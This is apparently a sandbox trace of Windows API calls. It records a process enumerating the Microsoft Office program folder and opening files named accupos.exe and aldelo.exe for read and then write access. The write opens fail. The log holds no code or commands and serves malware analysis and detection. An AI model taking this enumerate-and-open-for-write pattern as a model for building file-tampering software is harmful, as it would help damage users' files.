RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0098.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0098.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0098.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0098.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0098.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0098.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0098.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0098.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0098.082] AreFileApisANSI () returned 1 [0098.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office", lpUsedDefaultChar=0x0) returned 34 [0098.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0098.082] AreFileApisANSI () returned 1 [0098.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0098.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68d60 [0098.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=34 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office") returned 34 [0098.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office" (normalized: "c:\\program files\\microsoft office"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.082] GetLastError () returned 0x5 [0098.082] GetLastError () returned 0x5 [0098.082] SetLastError (dwErrCode=0x5) [0098.082] GetLastError () returned 0x5 [0098.082] SetLastError (dwErrCode=0x5) [0098.082] GetLastError () returned 0x5 [0098.083] SetLastError (dwErrCode=0x5) [0098.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0098.083] AreFileApisANSI () returned 1 [0098.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0098.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68ea0 [0098.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x68ea0, cchWideChar=34 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office") returned 34 [0098.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office" (normalized: "c:\\program files\\microsoft office"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.083] GetLastError () returned 0x5 [0098.083] GetLastError () returned 0x5 [0098.083] SetLastError (dwErrCode=0x5) [0098.083] GetLastError () returned 0x5 [0098.083] SetLastError (dwErrCode=0x5) [0098.083] GetLastError () returned 0x5 [0098.083] SetLastError (dwErrCode=0x5) [0098.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ea0 | out: hHeap=0x20000) returned 1 [0098.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0098.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0098.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0098.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0098.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0098.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0098.084] FindNextFileW (in: hFindFile=0x78650, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82e68d8a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x39f9ef56, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x39f9ef56, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft Office 15", cAlternateFileName="MICROS~1")) returned 1 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0098.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0098.084] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78510 [0098.084] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b42f70b, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3b42f70b, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.084] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fa8c100, ftCreationTime.dwHighDateTime=0x1d56248, ftLastAccessTime.dwLowDateTime=0x71a98d00, ftLastAccessTime.dwHighDateTime=0x1d552ab, ftLastWriteTime.dwLowDateTime=0x71a98d00, ftLastWriteTime.dwHighDateTime=0x1d552ab, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="accupos.exe", cAlternateFileName="")) returned 1 [0098.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0098.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0098.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0098.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0098.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0098.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0098.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0098.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.085] AreFileApisANSI () returned 1 [0098.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\accupos.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\accupos.exe", lpUsedDefaultChar=0x0) returned 46 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0098.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0098.086] AreFileApisANSI () returned 1 [0098.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0098.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0098.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\accupos.exe") returned 46 [0098.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\accupos.exe" (normalized: "c:\\program files\\microsoft office\\accupos.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0098.086] GetFileType (hFile=0x420) returned 0x1 [0098.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0098.086] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.086] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.086] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.086] CloseHandle (hObject=0x420) returned 1 [0098.087] AreFileApisANSI () returned 1 [0098.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0098.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0098.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\accupos.exe") returned 46 [0098.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\accupos.exe" (normalized: "c:\\program files\\microsoft office\\accupos.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.087] GetLastError () returned 0x20 [0098.087] GetLastError () returned 0x20 [0098.087] SetLastError (dwErrCode=0x20) [0098.087] GetLastError () returned 0x20 [0098.087] SetLastError (dwErrCode=0x20) [0098.087] GetLastError () returned 0x20 [0098.087] SetLastError (dwErrCode=0x20) [0098.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0098.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0098.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0098.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.087] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce63ffa0, ftCreationTime.dwHighDateTime=0x1d5c059, ftLastAccessTime.dwLowDateTime=0xddf8d430, ftLastAccessTime.dwHighDateTime=0x1d56d9e, ftLastWriteTime.dwLowDateTime=0xddf8d430, ftLastWriteTime.dwHighDateTime=0x1d56d9e, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="aldelo.exe", cAlternateFileName="")) returned 1 [0098.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0098.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0098.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0098.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0098.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0098.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0098.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0098.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0098.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0098.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.088] AreFileApisANSI () returned 1 [0098.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\aldelo.exe", lpUsedDefaultChar=0x0) returned 45 [0098.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0098.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.089] AreFileApisANSI () returned 1 [0098.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0098.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0098.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\aldelo.exe") returned 45 [0098.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\aldelo.exe" (normalized: "c:\\program files\\microsoft office\\aldelo.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0098.089] GetFileType (hFile=0x420) returned 0x1 [0098.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0098.089] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.089] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.089] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.090] CloseHandle (hObject=0x420) returned 1 [0098.090] AreFileApisANSI () returned 1 [0098.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0098.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0098.090] 